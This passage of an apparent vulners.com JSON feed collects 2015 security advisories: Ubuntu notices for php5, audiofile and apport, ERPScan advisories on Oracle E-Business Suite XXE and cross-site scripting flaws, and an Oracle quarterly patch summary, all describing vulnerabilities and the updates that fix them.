conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32653", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32653", "title": "[ERPSCAN-15-028] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "Crash on audiofiles processing.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14754", "title": "audiofile memory corruption", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. (CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4854"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite Cross-site Scripting\r\nAdvisory ID: [ERPSCAN-15-027]\r\nAdvisory URL:http://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: Cross-site Scripting\r\nImpact: impersonation, information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4854\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality None (N)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nAn anonymous attacker can create a special link that injects malicious JS code\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nCfgOCIReturn servlet is vulnerable to Cross-site Scripting (XSS) due\r\nto lack of sanitizing the "domain" parameter.\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32658", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32658", "title": "[ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1341"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
